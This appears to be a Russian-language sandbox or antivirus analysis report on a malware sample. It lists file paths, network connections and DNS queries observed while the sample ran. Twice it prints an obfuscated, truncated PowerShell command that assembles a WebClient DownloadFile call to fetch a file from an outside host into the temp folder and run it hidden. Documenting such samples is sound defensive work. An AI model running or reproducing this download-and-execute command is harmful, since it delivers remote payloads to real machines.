Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $BIlUKWkiR='*.*-EX'.replace('*.*-','I'); sal lyEbGWXmr $BIlUKWkiR;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://u.teknik.io/PkV9U.txt'',$env:temp+''\''+''nL...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'u.##knik.io':443
- DNS ASK u.##knik.io
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $BIlUKWkiR='*.*-EX'.replace('*.*-','I'); sal lyEbGWXmr $BIlUKWkiR;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://u.teknik.io/PkV9U.txt'',$env:temp+''\''+''nL...' (со скрытым окном)